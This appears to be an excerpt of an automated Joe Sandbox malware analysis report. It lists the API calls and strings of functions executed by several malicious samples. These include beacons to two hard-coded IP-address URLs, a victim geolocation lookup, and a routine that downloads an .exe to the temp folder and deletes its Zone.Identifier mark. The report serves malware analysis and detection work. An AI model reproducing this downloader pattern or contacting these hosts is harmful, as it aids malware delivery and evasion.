Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 01269f55f80f4093f7790e9711fcee96e911aa1ee942c11418324038200df6c0
Instruction ID: cfa9ea990c7f70aa885dd194d13a45580bcc139835a23e551ab79b8de7a888d0
Opcode Fuzzy Hash: 01269f55f80f4093f7790e9711fcee96e911aa1ee942c11418324038200df6c0
Instruction Fuzzy Hash: AFC1BBB1D01228BBEF24DB64CC51BADB7B5BF54304F0885DAE44966341EB359B88CFA1

Function 001D10A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 001D10B9
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 001D10CF
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 001D10FA
InternetCloseHandle.WININET(?), ref: 001D1107
InternetCloseHandle.WININET(00000000), ref: 001D1114

Strings

http://185.215.113.66/tcoin.php?s=%s, xrefs: 001D10AD
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 001D10CA

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: Internet$CloseHandleOpen$wsprintf
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://185.215.113.66/tcoin.php?s=%s
API String ID: 1691607147-1762395284
Opcode ID: 7abc1cd99e0717184bfab366ecaa6aad8bf36fe3d741fef8e278cab932ab087a
Instruction ID: 940157e0ff3d1a65f5b34a06edb7b214bb0f01d4b93db8bea78afab3e5f3e2ce
Opcode Fuzzy Hash: 7abc1cd99e0717184bfab366ecaa6aad8bf36fe3d741fef8e278cab932ab087a
Instruction Fuzzy Hash: 4E013674E8131ABBD725DFA8DD09FAA7778EB04701F1000A9B615662D0D6706B44CB56

Analysis Process: 2688734187.exePID: 2652, Parent PID: 8160COMMON

Executed Functions

Function 00007FF6D3C314B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1968460470.00007FF6D3C31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D3C30000, based on PE: true

Associated: 00000012.00000002.1968381551.00007FF6D3C30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000012.00000002.1968530728.00007FF6D3C4B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000012.00000002.1968571403.00007FF6D3C4C000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000012.00000002.1969575058.00007FF6D41B7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000012.00000002.1969646397.00007FF6D41B9000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000012.00000002.1969668483.00007FF6D41C2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000012.00000002.1969710104.00007FF6D41C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000012.00000002.1969732879.00007FF6D41C6000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff6d3c30000_2688734187.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction ID: 5774cb4a784dd527967e3ff0dec20149ca5ec3ba65f9721e392f40e900f8f130
Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction Fuzzy Hash: 10B01230908309D8E3003F11DC822EC32346B06780F404032C50C63352DF7D5460CB10

Analysis Process: 1657630034.exePID: 5420, Parent PID: 7744COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00391080 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0039109A
wsprintfW.USER32 ref: 003910B3
PathFileExistsW.KERNELBASE(?), ref: 003910C3
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 003910E9
CloseHandle.KERNELBASE(000000FF), ref: 00391105

Strings

%temp%, xrefs: 00391095
^Gv, xrefs: 003910C3
%s\feeea3sdfasgsa.txt, xrefs: 003910A7

Memory Dump Source

Source File: 00000013.00000002.1839634675.0000000000391000.00000020.00000001.01000000.00000010.sdmp, Offset: 00390000, based on PE: true

Associated: 00000013.00000002.1839614752.0000000000390000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839652674.0000000000392000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839671902.0000000000393000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839692508.00000000003A0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839711922.00000000003A1000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_390000_1657630034.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\feeea3sdfasgsa.txt$%temp%$^Gv
API String ID: 750032643-3553453870
Opcode ID: f1ef35cd2bb79e667c314cdb1495eda4e4c2a2020e72e80e63c7fef91d067388
Instruction ID: 9c08ff7527283b97ee6cd1dd23205c0fc820d13573b1c51a4c772fa53fe4a284
Opcode Fuzzy Hash: f1ef35cd2bb79e667c314cdb1495eda4e4c2a2020e72e80e63c7fef91d067388
Instruction Fuzzy Hash: 5E01DFB4900308BBDB228B209C0AFE6333CAB04704F004695B718A21D1DAB15AC8CFA5

Function 00391000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 36
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 00391015
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0039102B
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00391056
InternetCloseHandle.WININET(?), ref: 00391063
InternetCloseHandle.WININET(00000000), ref: 00391070

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00391026
http://91.202.233.141/IBSTSWSONL, xrefs: 00391009

Memory Dump Source

Source File: 00000013.00000002.1839634675.0000000000391000.00000020.00000001.01000000.00000010.sdmp, Offset: 00390000, based on PE: true

Associated: 00000013.00000002.1839614752.0000000000390000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839652674.0000000000392000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839671902.0000000000393000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839692508.00000000003A0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839711922.00000000003A1000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_390000_1657630034.jbxd

Similarity

API ID: Internet$CloseHandleOpen$wsprintf
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/IBSTSWSONL
API String ID: 1691607147-3072516501
Opcode ID: e140dfcc1c3b73fc88a961b752f4769068c17c9b4ee89efdd71bae924697b351
Instruction ID: 7ea795f2c2421c8a06cf10c1e3041c9250b89b39e53581b341b4ac96f6b1a0be
Opcode Fuzzy Hash: e140dfcc1c3b73fc88a961b752f4769068c17c9b4ee89efdd71bae924697b351
Instruction Fuzzy Hash: 0F014474EC0306BBDB26DF64DD0AFAA777CEB04701F1000A9B605A72C0D6716B44CB65

Function 00391120 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00391128

Part of subcall function 00391080: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0039109A
Part of subcall function 00391080: wsprintfW.USER32 ref: 003910B3
Part of subcall function 00391080: PathFileExistsW.KERNELBASE(?), ref: 003910C3

Part of subcall function 00391000: wsprintfW.USER32 ref: 00391015
Part of subcall function 00391000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0039102B
Part of subcall function 00391000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00391056
Part of subcall function 00391000: InternetCloseHandle.WININET(?), ref: 00391063
Part of subcall function 00391000: InternetCloseHandle.WININET(00000000), ref: 00391070

Memory Dump Source

Source File: 00000013.00000002.1839634675.0000000000391000.00000020.00000001.01000000.00000010.sdmp, Offset: 00390000, based on PE: true

Associated: 00000013.00000002.1839614752.0000000000390000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839652674.0000000000392000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839671902.0000000000393000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839692508.00000000003A0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000013.00000002.1839711922.00000000003A1000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_390000_1657630034.jbxd

Similarity

API ID: Internet$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathSleepStrings
String ID:
API String ID: 2566316890-0
Opcode ID: b108b18d4e33ea4ed5673ec2f1ed19e9069b7f407b324d9577226e875e644545
Instruction ID: cfb3b1efbaf3211e0aa8ce46d25cc0d73108194d1a8f938c469d5a781a99cc91
Opcode Fuzzy Hash: b108b18d4e33ea4ed5673ec2f1ed19e9069b7f407b324d9577226e875e644545
Instruction Fuzzy Hash: 60C04C3114825B66AA5272B26C0A727369C5B00791F404463B585E86D7DD87D461A4B2

Analysis Process: powershell.exePID: 7296, Parent PID: 2592COMMON

Executed Functions

Function 00007FFE7DC5E3FC Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1957566896.00007FFE7DC5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DC5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe7dc5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da67553a64567ef33b6bce3b690866f8458b5719c6d716a849590fb6d8fd262
Instruction ID: c59456deb7bac550d8ce77ed8c4ac68c2f5a2ec5d5e01f6873f439dcea6db95f
Opcode Fuzzy Hash: 4da67553a64567ef33b6bce3b690866f8458b5719c6d716a849590fb6d8fd262
Instruction Fuzzy Hash: 3A11517150CF088F9BA8EF1DE48595677E0FB98320B10465FD459C7665D731E882CBC2

Function 00007FFE7DD74675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1960036128.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe7dd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
Instruction ID: 28f3797459fa2f05538c412308d8801ec7d71fb6bb4550837be9e9851e3a97c1
Opcode Fuzzy Hash: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
Instruction Fuzzy Hash: 6F01677111CB0C4FD754EF0CE451AA9B7E0FB95364F10066EE58AC3661D736E891CB45

Function 00007FFE7DE453E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1960659146.00007FFE7DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe7de40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f31e2e9d96ee56206d3bee4f0a6ff2c4067734e4d2e1808545a3bb3670a168e
Instruction ID: e6495e7f2e78e2e8995756140b1443200f02f8ecec1b80811ec64984f1c848f8
Opcode Fuzzy Hash: 6f31e2e9d96ee56206d3bee4f0a6ff2c4067734e4d2e1808545a3bb3670a168e
Instruction Fuzzy Hash: 6EF0A03131CF044FE748EE2DE8496A6B3E1FBA8311F10462FE44AC3661DA25E8818782

Function 00007FFE7DE44A21 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1960659146.00007FFE7DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe7de40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac411e2573e8395dcc16cfa2166db8bf675480d51829e9aecb55cd4f4e282584
Instruction ID: 575bf8fc5e00c81abcad8d9415bd173d0619b0f92c750921cd722f77c8e0aef1
Opcode Fuzzy Hash: ac411e2573e8395dcc16cfa2166db8bf675480d51829e9aecb55cd4f4e282584
Instruction Fuzzy Hash: 8CF05E32A0D9458FD765EA4CE4418A873E0EF4533071504FBE169C7573EA25EC418740

Function 00007FFE7DE44CD4 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1960659146.00007FFE7DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe7de40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb8a47761ad2d6a3e7ccb73ee48412dd6e2ad61d5c0110ddbe68ed951248188
Instruction ID: d1dfef0c30bbe900d3a3935ca29887af7078ccdc15117ab6b8a4f2a0ce71b13a
Opcode Fuzzy Hash: 2cb8a47761ad2d6a3e7ccb73ee48412dd6e2ad61d5c0110ddbe68ed951248188
Instruction Fuzzy Hash: 0FF08C32A0D5088FD766EB48E4419E877E0EF4533071904F7E119CB463EA2AEC41C740

Analysis Process: 2910625892.exePID: 1852, Parent PID: 7744COMMON

Executed Functions

Function 009E1840 Relevance: .0, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03acec3e3a68d67e76334f55a92a31785c36fc2eb390d96455b8251fd9f555ae
Instruction ID: d646614227e6504ef912d6df150d376b9c7e3fff89536967588c08f67a4e38db
Opcode Fuzzy Hash: 03acec3e3a68d67e76334f55a92a31785c36fc2eb390d96455b8251fd9f555ae
Instruction Fuzzy Hash: 22B0927090920CE78B08EB8AE91296EB7AEDB85311B1002EDF80C53341DA722F1096D9

Function 009E1380 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 166
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(MSIE,00000001,00000000,00000000,00000000), ref: 009E13B9
InternetOpenUrlA.WININET(?,00000000), ref: 009E1445
InternetCloseHandle.WININET(?), ref: 009E1470

Strings

"geoplugin_countryCode":", xrefs: 009E151F
MSIE, xrefs: 009E13B4
http://www.geoplugin.net/json.gp?ip=, xrefs: 009E1405

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: Internet$Open$CloseHandle
String ID: "geoplugin_countryCode":"$MSIE$http://www.geoplugin.net/json.gp?ip=
API String ID: 3289985339-822378312
Opcode ID: 3402f3501ce7ac14db07859145295f463229a74523a88d0279d332a561d49035
Instruction ID: c0fb3bbf10c088a46a3af774b9efa6f740bb6698fc17ef525d962f92a792e7ed
Opcode Fuzzy Hash: 3402f3501ce7ac14db07859145295f463229a74523a88d0279d332a561d49035
Instruction Fuzzy Hash: 13715570D082D8EBDB25DBA5CD95BDDB7B5BB48740F008198E189AB281DBB06EC5CF50

Function 009E10B0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009E10CA
wsprintfW.USER32 ref: 009E10E3
PathFileExistsW.KERNELBASE(?), ref: 009E10F3
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 009E1119
CloseHandle.KERNELBASE(000000FF), ref: 009E1135

Strings

%s\faeeeeeeeaef.txt, xrefs: 009E10D7
^Gv, xrefs: 009E10F3
%temp%, xrefs: 009E10C5

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\faeeeeeeeaef.txt$%temp%$^Gv
API String ID: 750032643-3839393303
Opcode ID: 040faf96f159bd6c70ab97a5d61509c14d677f820e75fa5e62353dd685297821
Instruction ID: a4905c66cb1d7e6795554f8f691c37d49fc15033c137e8770809feee0d10c74b
Opcode Fuzzy Hash: 040faf96f159bd6c70ab97a5d61509c14d677f820e75fa5e62353dd685297821
Instruction Fuzzy Hash: 7C01A7F0948358ABDB30DB60DC8EFE5733CAB44705F0046D4A755A50D2D6B05EC69FA5

Function 009E1640 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 009E164B

Part of subcall function 009E10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009E10CA
Part of subcall function 009E10B0: wsprintfW.USER32 ref: 009E10E3
Part of subcall function 009E10B0: PathFileExistsW.KERNELBASE(?), ref: 009E10F3

GetTickCount.KERNEL32 ref: 009E1661

Part of subcall function 009E28BA: __getptd.LIBCMT ref: 009E28BF

Part of subcall function 009E1380: InternetOpenA.WININET(MSIE,00000001,00000000,00000000,00000000), ref: 009E13B9

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: CountEnvironmentExistsExpandFileInternetOpenPathSleepStringsTick__getptdwsprintf
String ID:
API String ID: 69823509-0
Opcode ID: b06e871909ae18c2c4bd5887a0fd225800bde4bd8b644c79cc96b301feb8242a
Instruction ID: f20d2dd05f92d914672f74fb4d21368dcccbf7b0888ec89a7e07eff7e9dbe271
Opcode Fuzzy Hash: b06e871909ae18c2c4bd5887a0fd225800bde4bd8b644c79cc96b301feb8242a
Instruction Fuzzy Hash: CF2186B1D102889BCF06EFE2EC51AEE73B8BF44745F104529F40166242EF75AD09CB61

Function 009E8592 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 009E85A7

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f74a8fc0c812317bbd4b60117dd61c2831de8b9920c14178a5cb2ea3958e46b6
Instruction ID: a1112248fe13a8b242978ef8421a24fef95f525d38b8c20e205db166512ad601
Opcode Fuzzy Hash: f74a8fc0c812317bbd4b60117dd61c2831de8b9920c14178a5cb2ea3958e46b6
Instruction Fuzzy Hash: C3D05E729A83899EEB009FB26C08B323BDC9384396F408435F81CC6191F9B0C980EA00

Non-executed Functions

Function 009E4C71 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 009E88FD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009E8912
UnhandledExceptionFilter.KERNEL32(009ECDA4), ref: 009E891D
GetCurrentProcess.KERNEL32(C0000409), ref: 009E8939
TerminateProcess.KERNEL32(00000000), ref: 009E8940

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 4fc54b3279a513d453b7586827ba6677383d196b644edd1565d069302b00c611
Instruction ID: 36735410de7884c5882e01fe8edbbbf5f9fe3652bc57063d64784ea107649105
Opcode Fuzzy Hash: 4fc54b3279a513d453b7586827ba6677383d196b644edd1565d069302b00c611
Instruction Fuzzy Hash: 8A2100B5829344DFCB41DF26EC866683BECBB88309F50402AE64897272E7B05981EF05

Function 009E1150 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 129
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 009E1159

Part of subcall function 009E28BA: __getptd.LIBCMT ref: 009E28BF

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009E1180
_strlen.LIBCMT ref: 009E118A
_mbstowcs.LIBCMT ref: 009E11A1

Part of subcall function 009E2B16: __mbstowcs_l_helper.LIBCMT ref: 009E2B36

_rand.LIBCMT ref: 009E11A9

Part of subcall function 009E28CC: __getptd.LIBCMT ref: 009E28CC

_rand.LIBCMT ref: 009E11BD
wsprintfW.USER32 ref: 009E11E4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009E11FA
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,jjj,00000000), ref: 009E1229
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 009E1258
InternetReadFile.WININET(00000000,?,00000103,?), ref: 009E128B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 009E12BC
CloseHandle.KERNEL32(000000FF), ref: 009E12CB
wsprintfW.USER32 ref: 009E12E4
DeleteFileW.KERNEL32(?), ref: 009E12F4
CloseHandle.KERNEL32(000000FF), ref: 009E1310
InternetCloseHandle.WININET(00000000), ref: 009E131D
InternetCloseHandle.WININET(00000000), ref: 009E132A

Strings

%s:Zone.Identifier, xrefs: 009E12D8
%s\%d%d.exe, xrefs: 009E11D8
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 009E11F5
jjj, xrefs: 009E1215
%temp%, xrefs: 009E117B

Memory Dump Source

Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open__getptd_randwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWrite__mbstowcs_l_helper_mbstowcs_strlen
String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36$jjj
API String ID: 95124798-2602374422
Opcode ID: 13bbf062875f778e66ef77c2de9db16c3cc00115fdf1705602c94ffc09b48f34
Instruction ID: 70795b4b832bd2ff32fda3cb2a6688ddc2e9e60f75769e42a7386c05691c800e
Opcode Fuzzy Hash: 13bbf062875f778e66ef77c2de9db16c3cc00115fdf1705602c94ffc09b48f34
Instruction Fuzzy Hash: 0B41F5F1904358ABEB24DB60CC8AFEA737DAB8C701F040098F649A61D1DA749E81CF60

Function 009E500A Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,009EE3F0,0000000C,009E5145,00000000,00000000,?,?,009E5172,?,009E28C4,?,009E1165,00000000), ref: 009E501C
